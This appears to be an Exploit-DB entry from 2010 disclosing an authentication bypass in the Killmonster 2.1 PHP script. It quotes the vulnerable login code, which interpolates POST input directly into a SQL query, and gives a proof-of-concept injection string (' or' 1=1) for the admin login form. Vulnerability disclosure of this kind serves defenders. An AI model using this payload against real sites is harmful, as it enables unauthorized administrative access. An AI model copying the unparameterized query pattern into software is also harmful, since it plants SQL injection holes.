[] NeoSense

Killmonster 2.1 - Authentication Bypass

Author: cr4wl3r
type: webapps
platform: php
port: 
date_added: 2010-02-06 
date_updated:  
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comkm2.zip

[+] Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/km2/


[+] Vuln Code :

[login.php]

<form method="POST" action="authenticate.php">
Type Username Here: <input type="text" name="isadmin" size="15"><br>
Type Password Here: <input type="password" name="password" size="15" mask="x"><br>
<input type="submit" value="submit" name="submit">

[authenticate.php]

    $isadmin=$_POST['isadmin'];
    $password=$_POST['password'];
    $password=md5($password);
    $query = "select * from km_admins where username='$isadmin' and password='$password'";
    $result = mysql_query($query) ;




[+] PoC : [Killmonster_path]/admin/login.php

username :  ' or' 1=1
password :  ' or' 1=1